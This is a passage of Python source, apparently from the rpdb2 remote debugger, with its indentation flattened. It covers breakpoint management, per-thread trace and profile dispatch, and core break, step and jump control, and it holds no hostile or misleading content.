id = old_bp.m_id
self.__remove_from_function_list(old_bp)
except KeyError:
#
# Find the smallest available ID.
#
bpids = list(self.m_break_points_by_id.keys())
bpids.sort()
id = 0
while id < len(bpids):
if bpids[id] != id:
break
id += 1
bp.m_id = id
self.m_break_points_by_id[id] = bp
bpm[l] = bp
if fEnabled:
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
return bp
finally:
self.m_lock.release()
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.disable()
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
bp.enable()
self.__add_to_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
finally:
self.m_lock.release()
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoint.
"""
try:
self.m_lock.acquire()
if fAll:
id_list = list(self.m_break_points_by_id.keys())
for id in id_list:
try:
bp = self.m_break_points_by_id[id]
except KeyError:
continue
filename = bp.m_filename
lineno = bp.m_lineno
bpm = self.m_break_points_by_file[filename]
if bp == bpm[lineno]:
del bpm[lineno]
if len(bpm) == 0:
del self.m_break_points_by_file[filename]
self.__remove_from_function_list(bp)
self.__calc_active_break_points_by_file(bp.m_filename)
del self.m_break_points_by_id[id]
finally:
self.m_lock.release()
def get_breakpoints(self):
return self.m_break_points_by_id
#
# ----------------------------------- Core Debugger ------------------------------------
#
class CCodeContext:
"""
Class represents info related to code objects.
"""
def __init__(self, frame, bp_manager):
self.m_code = frame.f_code
self.m_filename = calc_frame_path(frame)
self.m_basename = os.path.basename(self.m_filename)
self.m_file_breakpoints = bp_manager.get_active_break_points_by_file(self.m_filename)
self.m_fExceptionTrap = False
def is_untraced(self):
"""
Return True if this code object should not be traced.
"""
return self.m_basename in [THREADING_FILENAME, DEBUGGER_FILENAME]
def is_exception_trap_frame(self):
"""
Return True if this frame should be a trap for unhandled
exceptions.
"""
if self.m_basename == THREADING_FILENAME:
return True
if self.m_basename == DEBUGGER_FILENAME and self.m_code.co_name in ['__execv', '__execve', '__function_wrapper']:
return True
return False
class CDebuggerCoreThread:
"""
Class represents a debugged thread.
This is a core structure of the debugger. It includes most of the
optimization tricks and hacks, and includes a good amount of
subtle bug fixes, be carefull not to mess it up...
"""
def __init__(self, name, core_debugger, frame, event):
self.m_thread_id = thread.get_ident()
self.m_thread_name = name
self.m_fBroken = False
self.m_fUnhandledException = False
self.m_frame = frame
self.m_event = event
self.m_ue_lineno = None
self.m_uef_lineno = None
self.m_code_context = core_debugger.get_code_context(frame)
self.m_locals_copy = {}
self.m_core = core_debugger
self.m_bp_manager = core_debugger.m_bp_manager
self.m_frame_lock = threading.Condition()
self.m_frame_external_references = 0
self.m_exc_info = None
self.m_depth = 0
self.set_depth(frame)
def set_depth(self, frame):
self.m_depth = 0
while frame is not None:
self.m_depth += 1
frame = frame.f_back
def profile_recursion(self, frame, event, arg):
if event == 'call':
if self.m_depth > g_recursionlimit:
print_debug('Exceeded recursion limit and caught in profile function.')
try:
#
# The allowed recursion limit was exceeded.
# To view the offending script frame, go two frames
# down the stack with the 'down' console command.
#
raise RuntimeError('maximum recursion depth exceeded')
except:
#
# Schedule the debugger to re-enable the profile hook.
#
self.set_tracers(fsignal_exception = True)
raise
elif event == 'return':
return self.profile(frame, event, arg)
def profile(self, frame, event, arg):
"""
Profiler method.
The Python profiling mechanism is used by the debugger
mainly to handle synchronization issues related to the
life time of the frame structure.
"""
#print_debug('profile: %s, %s, %s, %s, %s' % (repr(frame), event, frame.f_code.co_name, frame.f_code.co_filename, repr(arg)[:40]))
if event == 'return':
self.m_depth -= 1
if sys.excepthook != g_excepthook:
set_excepthook()
self.m_frame = frame.f_back
try:
self.m_code_context = self.m_core.m_code_contexts[self.m_frame.f_code]
except AttributeError:
if self.m_event != 'return' and self.m_core.m_ftrap:
#
# An exception is raised from the outer-most frame.
# This means an unhandled exception.
#
self.m_frame = frame
self.m_event = 'exception'
self.m_uef_lineno = self.m_ue_lineno
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
self.m_uef_lineno = None
if frame in self.m_locals_copy:
self.update_locals()
self.m_frame = None
self.m_core.remove_thread(self.m_thread_id)
sys.setprofile(None)
sys.settrace(self.m_core.trace_dispatch_init)
if self.m_frame_external_references == 0:
return
#
# Wait until no one references the frame object
#
try:
self.m_frame_lock.acquire()
while self.m_frame_external_references != 0:
safe_wait(self.m_frame_lock, 1.0)
finally:
self.m_frame_lock.release()
def frame_acquire(self):
"""
Aquire a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references += 1
f = self.m_frame
if f is None:
raise ThreadDone
return f
finally:
self.m_frame_lock.release()
def frame_release(self):
"""
Release a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references -= 1
if self.m_frame_external_references == 0:
self.m_frame_lock.notify()
finally:
self.m_frame_lock.release()
def get_frame(self, base_frame, index, fException = False):
"""
Get frame at index depth down the stack.
Starting from base_frame return the index depth frame
down the stack. If fException is True use the exception
stack (traceback).
"""
if fException:
tb = get_traceback(base_frame, self)
if tb is None:
raise NoExceptionFound
while tb.tb_next is not None:
tb = tb.tb_next
f = tb.tb_frame
else:
f = base_frame
while f is not None:
if not g_fDebug and f.f_code.co_name == 'rpdb2_import_wrapper':
f = f.f_back
continue
if index <= 0:
break
f = f.f_back
index -= 1
if (index < 0) or (f is None):
raise InvalidFrame
if (self.m_uef_lineno is not None) and (f.f_back is None):
lineno = self.m_uef_lineno
else:
lineno = f.f_lineno
if fException:
tb = get_traceback(base_frame, self)
while tb is not None:
if tb.tb_frame == f:
lineno = tb.tb_lineno
break
tb = tb.tb_next
return (f, lineno)
def get_locals_copy(self, frame_index, fException, fReadOnly):
"""
Get globals and locals of frame.
A copy scheme is used for locals to work around a bug in
Python 2.3 and 2.4 that prevents modifying the local dictionary.
"""
try:
base_frame = self.frame_acquire()
(f, lineno) = self.get_frame(base_frame, frame_index, fException)
if fReadOnly:
gc = copy.copy(f.f_globals)
else:
gc = f.f_globals
try:
(lc, olc) = self.m_locals_copy[f]
except KeyError:
if f.f_code.co_name in [MODULE_SCOPE, MODULE_SCOPE2]:
lc = gc
olc = gc
else:
lc = copy.copy(f.f_locals)
olc = copy.copy(lc)
if not fReadOnly:
self.m_locals_copy[f] = (lc, olc)
self.set_local_trace(f)
return (gc, lc, olc)
finally:
f = None
base_frame = None
self.frame_release()
def update_locals_copy(self):
"""
Update copy of locals with changes in locals.
"""
lct = self.m_locals_copy.get(self.m_frame, None)
if lct is None:
return
(lc, base) = lct
cr = copy.copy(self.m_frame.f_locals)
for k in cr:
if not k in base:
lc[k] = cr[k]
continue
if not cr[k] is base[k]:
lc[k] = cr[k]
def update_locals(self):
"""
Update locals with changes from copy of locals.
"""
lct = self.m_locals_copy.pop(self.m_frame, None)
if lct is None:
return
self.m_frame.f_locals.update(lct[0])
def __eval_breakpoint(self, frame, bp):
"""
Return True if the breakpoint is hit.
"""
if not bp.m_fEnabled:
return False
if bp.m_expr == '':
return True
try:
if frame in self.m_locals_copy:
l = self.m_locals_copy[frame][0]
v = eval(bp.m_code, frame.f_globals, l)
else:
v = eval(bp.m_code, frame.f_globals, frame.f_locals)
return (v != False)
except:
return False
def set_local_trace(self, frame, fsignal_exception = False):
"""
Set trace callback of frame.
Specialized trace methods are selected here to save switching time
during actual tracing.
"""
if not self.m_core.m_ftrace:
frame.f_trace = self.trace_dispatch_stop
return
if fsignal_exception:
frame.f_trace = self.trace_dispatch_signal
return
code_context = self.m_core.get_code_context(frame)
if self.m_core.is_break(self, frame):
frame.f_trace = self.trace_dispatch_break
elif code_context.m_fExceptionTrap or (frame.f_back is None):
frame.f_trace = self.trace_dispatch_trap
elif frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
frame.f_trace = self.trace_dispatch
elif frame in self.m_locals_copy:
frame.f_trace = self.trace_dispatch
elif frame == self.m_core.m_return_frame:
frame.f_trace = self.trace_dispatch
else:
del frame.f_trace
def set_tracers(self, fsignal_exception = False):
"""
Set trace callbacks for all frames in stack.
"""
try:
try:
f = self.frame_acquire()
while f is not None:
self.set_local_trace(f, fsignal_exception)
f = f.f_back
except ThreadDone:
f = None
finally:
f = None
self.frame_release()
def trace_dispatch_stop(self, frame, event, arg):
"""
Disable tracing for this thread.
"""
if frame in self.m_locals_copy:
self.update_locals()
sys.settrace(None)
sys.setprofile(None)
return None
def trace_dispatch_break(self, frame, event, arg):
"""
Trace method for breaking a thread.
"""
if event not in ['line', 'return', 'exception']:
return frame.f_trace
if event == 'exception':
self.set_exc_info(arg)
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
def trace_dispatch_call(self, frame, event, arg):
"""
Initial trace method for thread.
"""
if not self.m_core.m_ftrace:
return self.trace_dispatch_stop(frame, event, arg)
self.m_depth += 1
if self.m_depth > g_recursionlimit:
sys.setprofile(self.profile_recursion)
self.m_frame = frame
try:
self.m_code_context = self.m_core.m_code_contexts[frame.f_code]
except KeyError:
self.m_code_context = self.m_core.get_code_context(frame)
if self.m_core.m_fBreak or (self.m_core.m_step_tid == self.m_thread_id):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if not frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
return None
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
return self.trace_dispatch
def trace_dispatch(self, frame, event, arg):
"""
General trace method for thread.
"""
if (event == 'line'):
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_event = event
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return None
if event == 'exception':
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if not is_py3k() and not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_trap(self, frame, event, arg):
"""
Trace method used for frames in which unhandled exceptions
should be caught.
"""
if (event == 'line'):
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(frame, bp):
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
return frame.f_trace
if event == 'return':
last_event = self.m_event
self.m_event = event
if frame in self.m_locals_copy:
self.update_locals_copy()
if frame == self.m_core.m_return_frame:
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
if last_event == 'exception':
self.m_event = last_event
return None
if event == 'exception':
self.m_event = event
if self.m_code_context.m_fExceptionTrap and self.m_core.m_ftrap:
self.set_exc_info(arg)
self.m_fUnhandledException = True
self.m_core._break(self, frame, event, arg)
if frame in self.m_locals_copy:
self.update_locals()
return frame.f_trace
self.m_ue_lineno = frame.f_lineno
if frame in self.m_locals_copy:
self.update_locals()
self.set_local_trace(frame)
if is_py3k():
self.set_exc_info(arg)
elif not frame.f_exc_traceback is arg[2]:
(frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
return frame.f_trace
return frame.f_trace
def trace_dispatch_signal(self, frame, event, arg):
#print_debug('*** trace_dispatch_signal %s, %s, %s' % (frame.f_lineno, event, repr(arg)))
self.set_exc_info(arg)
self.set_tracers()
self.set_depth(frame)
sys.setprofile(self.profile)
return self.trace_dispatch_trap(frame, event, arg)
def set_exc_info(self, arg):
"""
Set exception information.
"""
if arg == None:
return
if is_py3k():
self.m_exc_info = arg
return
(t, v, tb) = arg
while tb is not None:
f = tb.tb_frame
f.f_exc_type = t
f.f_exc_value = v
f.f_exc_traceback = tb
tb = tb.tb_next
def get_exc_info(self):
return self.m_exc_info
def reset_exc_info(self):
self.m_exc_info = None
def is_breakpoint(self):
"""
Calc if current line is hit by breakpoint.
"""
bp = self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
if bp is not None and self.__eval_breakpoint(self.m_frame, bp):
return True
return False
def get_breakpoint(self):
"""
Return current line breakpoint if any.
"""
return self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
class CDebuggerCore:
"""
Base class for the debugger.
Handles basic debugger functionality.
"""
def __init__(self, fembedded = False):
self.m_ftrace = True
self.m_current_ctx = None
self.m_f_first_to_break = True
self.m_f_break_on_init = False
self.m_builtins_hack = None
self.m_timer_embedded_giveup = None
self.m_threads_lock = threading.Condition()
self.m_threads = {}
self.m_event_dispatcher = CEventDispatcher()
self.m_state_manager = CStateManager(STATE_RUNNING, self.m_event_dispatcher)
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_fUnhandledException = False
self.m_fBreak = False
self.m_lastest_event = None
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_step = (None, None, None)
self.m_saved_next = None
self.m_bp_manager = CBreakPointsManager()
self.m_code_contexts = {None: None}
self.m_fembedded = fembedded
self.m_embedded_event = threading.Event()
self.m_embedded_sync_t0 = 0
self.m_embedded_sync_t1 = 0
self.m_heartbeats = {0: time.time() + 3600}
def shutdown(self):
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def is_embedded(self):
return self.m_fembedded
def send_fork_switch(self, sync_n):
"""
Notify client that debuggee is forking and that it should
try to reconnect to the child.
"""
print_debug('Sending fork switch event')
event = CEventForkSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_exec_switch(self, sync_n):
"""
Notify client that debuggee is doing an exec and that it should
try to reconnect (in case the exec failed).
"""
print_debug('Sending exec switch event')
event = CEventExecSwitch(sync_n)
self.m_event_dispatcher.fire_event(event)
def send_event_exit(self):
"""
Notify client that the debuggee is shutting down.
"""
event = CEventExit()
self.m_event_dispatcher.fire_event(event)
def send_events(self, event):
pass
def set_request_go_timer(self, timeout):
"""
Set timeout thread to release debugger from waiting for a client
to attach.
"""
self.cancel_request_go_timer()
if timeout is None:
return
_timeout = max(1.0, timeout)
f = lambda: (
self.record_client_heartbeat(0, False, True),
self.request_go()
)
self.m_timer_embedded_giveup = threading.Timer(_timeout, f)
self.m_timer_embedded_giveup.start()
#
# sleep() releases control and allow timer thread to actually start
# before this scope returns.
#
time.sleep(0.1)
def cancel_request_go_timer(self):
t = self.m_timer_embedded_giveup
if t is not None:
self.m_timer_embedded_giveup = None
t.cancel()
def setbreak(self, f):
"""
Set thread to break on next statement.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if not tid in self.m_threads:
return self.settrace(f)
ctx = self.m_threads[tid]
f.f_trace = ctx.trace_dispatch_break
self.m_saved_next = self.m_next_frame
self.m_next_frame = f
def settrace(self, f = None, f_break_on_init = True, timeout = None, builtins_hack = None):
"""
Start tracing mechanism for thread.
"""
if not self.m_ftrace:
return
tid = thread.get_ident()
if tid in self.m_threads:
return
self.set_request_go_timer(timeout)
self.m_f_break_on_init = f_break_on_init
self.m_builtins_hack = builtins_hack
threading.settrace(self.trace_dispatch_init)
sys.settrace(self.trace_dispatch_init)
if f is not None:
f.f_trace = self.trace_dispatch_init
def stoptrace(self):
"""
Stop tracing mechanism.
"""
global g_fignore_atexit
g_fignore_atexit = True
threading.settrace(None)
sys.settrace(None)
sys.setprofile(None)
self.m_ftrace = False
self.set_all_tracers()
try:
self.request_go()
except DebuggerNotBroken:
pass
#self.m_threads = {}
def get_code_context(self, frame):
try:
return self.m_code_contexts[frame.f_code]
except KeyError:
if self.m_builtins_hack != None:
if calc_frame_path(frame) == self.m_builtins_hack:
self.m_builtins_hack = None
frame.f_globals['__builtins__'] = g_builtins_module
code_context = CCodeContext(frame, self.m_bp_manager)
return self.m_code_contexts.setdefault(frame.f_code, code_context)
def get_current_ctx(self):
if len(self.m_threads) == 0:
raise NoThreads
return self.m_current_ctx
def get_ctx(self, tid):
ctx = self.m_threads.get(tid, None)
if ctx == None:
raise ThreadNotFound
return ctx
def wait_for_first_thread(self):
"""
Wait until at least one debuggee thread is alive.
Python can have 0 threads in some circumstances as
embedded Python and the Python interpreter console.
"""
if self.m_current_ctx is not None:
return
try:
self.m_threads_lock.acquire()
while self.m_current_ctx is None:
safe_wait(self.m_threads_lock, 1.0)
finally:
self.m_threads_lock.release()
def notify_first_thread(self):
"""
Notify that first thread is available for tracing.
"""
try:
self.m_threads_lock.acquire()
self.m_threads_lock.notify()
finally:
self.m_threads_lock.release()
def set_exception_trap_frame(self, frame):
"""
Set trap for unhandled exceptions in relevant frame.
"""
while frame is not None:
code_context = self.get_code_context(frame)
if code_context.is_exception_trap_frame():
code_context.m_fExceptionTrap = True
return
frame = frame.f_back
def __set_signal_handler(self):
"""
Set rpdb2 to wrap all signal handlers.
"""
for key, value in list(vars(signal).items()):
if not key.startswith('SIG') or key in ['SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX']:
continue
handler = signal.getsignal(value)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
continue
try:
signal.signal(value, handler)
except:
print_debug('Failed to set signal handler for signal %s(%d)' % (key, value))
def clear_source_cache(self):
g_lines_cache.clear()
event = CEventClearSourceCache()
self.m_event_dispatcher.fire_event(event)
def trace_dispatch_init(self, frame, event, arg):
"""
Initial tracing method.
"""
if event not in ['call', 'line', 'return']:
return None
code_context = self.get_code_context(frame)
if event == 'call' and code_context.is_untraced():
return None
self.set_exception_trap_frame(frame)
try:
t = current_thread()
name = thread_get_name(t)
except:
name = ''
if name == 'MainThread':
self.__set_signal_handler()
ctx = CDebuggerCoreThread(name, self, frame, event)
ctx.set_tracers()
try:
self.m_threads_lock.acquire()
self.m_threads[ctx.m_thread_id] = ctx
nthreads = len(self.m_threads)
if nthreads == 1:
self.prepare_embedded_sync()
finally:
self.m_threads_lock.release()
if nthreads == 1:
self.clear_source_cache()
self.m_current_ctx = ctx
self.notify_first_thread()
if self.m_f_break_on_init:
self.m_f_break_on_init = False
self.request_break()
sys.settrace(ctx.trace_dispatch_call)
sys.setprofile(ctx.profile)
self.wait_embedded_sync(nthreads == 1)
if event == 'call':
return ctx.trace_dispatch_call(frame, event, arg)
elif hasattr(frame, 'f_trace') and (frame.f_trace is not None):
return frame.f_trace(frame, event, arg)
else:
return None
def prepare_embedded_sync(self):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
if t0 != 0:
self.fix_heartbeats(t - t0)
if self.get_clients_attached() == 0:
return
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
self.m_embedded_sync_t1 = t
self.m_embedded_event.clear()
def wait_embedded_sync(self, ftrigger):
if not self.m_fembedded:
return
t = time.time()
t0 = self.m_embedded_sync_t0
t1 = self.m_embedded_sync_t1
if t - t0 < EMBEDDED_SYNC_THRESHOLD:
return
if t - t1 >= EMBEDDED_SYNC_TIMEOUT:
return
if ftrigger:
event = CEventEmbeddedSync()
self.m_event_dispatcher.fire_event(event)
safe_wait(self.m_embedded_event, EMBEDDED_SYNC_TIMEOUT - (t - t1))
if ftrigger:
self.m_embedded_sync_t1 = 0
def embedded_sync(self):
self.m_embedded_event.set()
def set_all_tracers(self):
"""
Set trace methods for all frames of all threads.
"""
for ctx in list(self.m_threads.values()):
ctx.set_tracers()
def remove_thread(self, thread_id):
try:
del self.m_threads[thread_id]
if self.m_current_ctx.m_thread_id == thread_id:
self.m_current_ctx = list(self.m_threads.values())[0]
except (KeyError, IndexError):
self.m_embedded_sync_t0 = time.time()
def set_break_flag(self):
self.m_fBreak = (self.m_state_manager.get_state() == STATE_BROKEN)
def is_break(self, ctx, frame, event = None):
if self.m_fBreak:
return True
if ctx.m_fUnhandledException:
return True
if self.m_step_tid == ctx.m_thread_id:
return True
if self.m_next_frame == frame:
return True
if (self.m_return_frame == frame) and (event == 'return'):
return True
return False
def record_client_heartbeat(self, id, finit, fdetach):
"""
Record that client id is still attached.
"""
if finit:
self.m_heartbeats.pop(0, None)
if fdetach:
self.m_heartbeats.pop(id, None)
return
if finit or id in self.m_heartbeats:
self.m_heartbeats[id] = time.time()
def fix_heartbeats(self, missing_pulse):
for k, v in list(self.m_heartbeats.items()):
self.m_heartbeats[k] = v + missing_pulse
def get_clients_attached(self):
n = 0
t = time.time()
for v in list(self.m_heartbeats.values()):
if t < v + HEARTBEAT_TIMEOUT:
n += 1
return n
def is_waiting_for_attach(self):
if self.get_clients_attached() != 1:
return False
if list(self.m_heartbeats.keys()) != [0]:
return False
return True
def _break(self, ctx, frame, event, arg):
"""
Main break logic.
"""
global g_fos_exit
global g_module_main
if not self.is_break(ctx, frame, event) and not ctx.is_breakpoint():
ctx.set_tracers()
return
ctx.m_fBroken = True
f_full_notification = False
f_uhe_notification = False
step_tid = self.m_step_tid
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() != STATE_BROKEN:
self.set_break_dont_lock()
if g_module_main == -1:
try:
g_module_main = sys.modules['__main__']
except:
g_module_main = None
if not is_py3k() and not frame.f_exc_traceback is None:
ctx.set_exc_info((frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback))
if is_py3k() and ctx.get_exc_info() == None and sys.exc_info()[2] != None:
ctx.set_exc_info(sys.exc_info())
try:
t = current_thread()
ctx.m_thread_name = thread_get_name(t)
except:
pass
if ctx.m_fUnhandledException and not self.m_fUnhandledException:
self.m_fUnhandledException = True
f_uhe_notification = True
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.m_saved_step = (self.m_step_tid, self.m_saved_next, self.m_return_frame)
self.m_saved_next = None
self.m_bp_manager.m_fhard_tbp = True
if self.m_f_first_to_break or (self.m_current_ctx == ctx):
self.m_current_ctx = ctx
self.m_lastest_event = event
self.m_step_tid = None
self.m_next_frame = None
self.m_return_frame = None
self.m_saved_next = None
self.m_bp_manager.del_temp_breakpoint(breakpoint = ctx.get_breakpoint())
self.m_f_first_to_break = False
f_full_notification = True
finally:
self.m_state_manager.release()
ffork_second_stage = self.handle_fork(ctx)
self.handle_exec(ctx)
if self.is_auto_fork_first_stage(ctx.m_thread_id):
self.request_go_quiet()
elif self.m_ffork_auto and ffork_second_stage:
(self.m_step_tid, self.m_next_frame, self.m_return_frame) = self.m_saved_step
self.m_saved_step = (None, None, None)
self.m_bp_manager.m_fhard_tbp = False
self.request_go_quiet()
elif self.get_clients_attached() == 0:
#print_debug('state: %s' % self.m_state_manager.get_state())
self.request_go_quiet()
elif step_tid == ctx.m_thread_id and frame.f_code.co_name == 'rpdb2_import_wrapper':
self.request_step_quiet()
else:
if f_full_notification:
self.send_events(None)
else:
self.notify_thread_broken(ctx.m_thread_id, ctx.m_thread_name)
self.notify_namespace()
if f_uhe_notification:
self.send_unhandled_exception_event()
state = self.m_state_manager.wait_for_state([STATE_RUNNING])
self.prepare_fork_step(ctx.m_thread_id)
self.prepare_exec_step(ctx.m_thread_id)
ctx.m_fUnhandledException = False
ctx.m_fBroken = False
ctx.set_tracers()
ctx.reset_exc_info()
if g_fos_exit:
g_fos_exit = False
self.send_event_exit()
time.sleep(1.0)
self.stoptrace()
def is_auto_fork_first_stage(self, tid):
if not self.m_ffork_auto:
return False
return tid == g_forktid and g_forkpid == None
def prepare_fork_step(self, tid):
global g_forkpid
global g_ignore_broken_pipe
if tid != g_forktid:
return
self.m_step_tid = tid
g_forkpid = os.getpid()
if not self.m_ffork_into_child:
return
n = self.get_clients_attached()
self.send_fork_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
g_ignore_broken_pipe = time.time()
def handle_fork(self, ctx):
global g_forktid
global g_forkpid
tid = ctx.m_thread_id
if g_forkpid == None or tid != g_forktid:
return False
forkpid = g_forkpid
g_forkpid = None
g_forktid = None
if os.getpid() == forkpid:
#
# Parent side of fork().
#
if not self.m_ffork_into_child:
#CThread.clearJoin()
#g_server.jumpstart()
return True
self.stoptrace()
return False
#
# Child side of fork().
#
if not self.m_ffork_into_child:
self.stoptrace()
return False
self.m_threads = {tid: ctx}
CThread.clearJoin()
g_server.jumpstart()
return True
def prepare_exec_step(self, tid):
global g_execpid
if tid != g_exectid:
return
self.m_step_tid = tid
g_execpid = os.getpid()
n = self.get_clients_attached()
self.send_exec_switch(n)
time.sleep(0.5)
g_server.shutdown()
CThread.joinAll()
def handle_exec(self, ctx):
global g_exectid
global g_execpid
tid = ctx.m_thread_id
if g_execpid == None or tid != g_exectid:
return False
g_execpid = None
g_exectid = None
#
# If we are here it means that the exec failed.
# Jumpstart the debugger to allow debugging to continue.
#
CThread.clearJoin()
g_server.jumpstart()
return True
def notify_thread_broken(self, tid, name):
"""
Notify that thread (tid) has broken.
This notification is sent for each thread that breaks after
the first one.
"""
_event = CEventThreadBroken(tid, name)
self.m_event_dispatcher.fire_event(_event)
def notify_namespace(self):
"""
Notify that a namespace update query should be done.
"""
_event = CEventNamespace()
self.m_event_dispatcher.fire_event(_event)
def get_state(self):
return self.m_state_manager.get_state()
def verify_broken(self):
if self.m_state_manager.get_state() != STATE_BROKEN:
raise DebuggerNotBroken
def get_current_filename(self, frame_index, fException):
"""
Return path of sources corresponding to the frame at depth
'frame_index' down the stack of the current thread.
"""
ctx = self.get_current_ctx()
try:
f = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
frame_filename = calc_frame_path(f)
return frame_filename
finally:
f = None
base_frame = None
ctx.frame_release()
def get_threads(self):
return self.m_threads
def set_break_dont_lock(self):
self.m_f_first_to_break = True
self.m_state_manager.set_state(STATE_BROKEN, fLock = False)
self.set_break_flag()
self.set_all_tracers()
def request_break(self):
"""
Ask debugger to break (pause debuggee).
"""
if len(self.m_threads) == 0:
self.wait_for_first_thread()
try:
self.m_state_manager.acquire()
if self.m_state_manager.get_state() == STATE_BROKEN:
return
self.set_break_dont_lock()
finally:
self.m_state_manager.release()
self.send_events(None)
def request_go_quiet(self, fLock = True):
try:
self.request_go(fLock)
except DebuggerNotBroken:
pass
def request_go(self, fLock = True):
"""
Let debugger run.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
self.m_fUnhandledException = False
self.m_state_manager.set_state(STATE_RUNNING, fLock = False)
if self.m_fembedded:
time.sleep(0.33)
self.set_break_flag()
finally:
if fLock:
self.m_state_manager.release()
def request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
"""
Let debugger run until temp breakpoint as defined in the arguments.
"""
assert(is_unicode(filename))
assert(is_unicode(scope))
try:
self.m_state_manager.acquire()
self.verify_broken()
if filename in [None, '']:
_filename = self.get_current_filename(frame_index, fException)
elif not is_provider_filesystem(filename):
_filename = as_string(filename, sys.getfilesystemencoding())
else:
_filename = FindFile(filename, fModules = True)
self.m_bp_manager.set_temp_breakpoint(_filename, scope, lineno)
self.set_all_tracers()
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_step_quiet(self, fLock = True):
try:
self.request_step(fLock)
except DebuggerNotBroken:
pass
def request_step(self, fLock = True):
"""
Let debugger run until next statement is reached or a breakpoint
is hit in another thread.
"""
try:
if fLock:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
self.m_step_tid = ctx.m_thread_id
self.m_next_frame = None
self.m_return_frame = None
self.request_go(fLock = False)
finally:
if fLock:
self.m_state_manager.release()
def request_next(self):
"""
Let debugger run until next statement in the same frame
is reached or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event in ['return', 'exception']:
return self.request_step(fLock = False)
self.m_next_frame = ctx.m_frame
self.m_return_frame = None
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_return(self):
"""
Let debugger run until end of frame frame is reached
or a breakpoint is hit in another thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
if self.m_lastest_event == 'return':
return self.request_step(fLock = False)
self.m_next_frame = None
self.m_return_frame = ctx.m_frame
self.request_go(fLock = False)
finally:
self.m_state_manager.release()
def request_jump(self, lineno):
"""
Jump to line number 'lineno'.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
ctx = self.get_current_ctx()
except NoThreads:
return
frame = ctx.m_frame
code = frame.f_code
valid_lines = CalcValidLines(code)
sbi = CScopeBreakInfo(as_unicode(''), valid_lines)
l = sbi.CalcScopeLine(lineno)
frame.f_lineno = l
finally:
frame = None
self.m_state_manager.release()
self.send_events(None)
def set_thread(self, tid):
"""
Switch focus to specified thread.
"""
try:
self.m_state_manager.acquire()
self.verify_broken()
try:
